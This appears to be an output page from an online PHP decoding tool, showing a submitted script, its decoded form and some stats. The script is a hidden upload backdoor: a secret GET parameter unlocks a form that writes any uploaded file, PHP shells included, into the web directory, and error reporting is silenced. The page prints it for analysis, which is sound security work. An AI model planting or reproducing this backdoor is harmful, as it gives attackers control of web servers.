Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0); if(isset($_GET['gZ9hk'])){ echo "<form method='POST' enctype='mu..
Decoded Output download
<?php error_reporting(0); if(isset($_GET['gZ9hk'])){ echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>"; move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); exit(0); } ?>
Did this file decode correctly?
Original Code
<?php error_reporting(0); if(isset($_GET['gZ9hk'])){ echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /> <input type='submit' value='upload' /></form>"; move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); exit(0); } ?>
Function Calls
error_reporting | 1 |
Stats
MD5 | 918347ab6d5aae7037cc9c7bfbcda058 |
Eval Count | 0 |
Decode Time | 131 ms |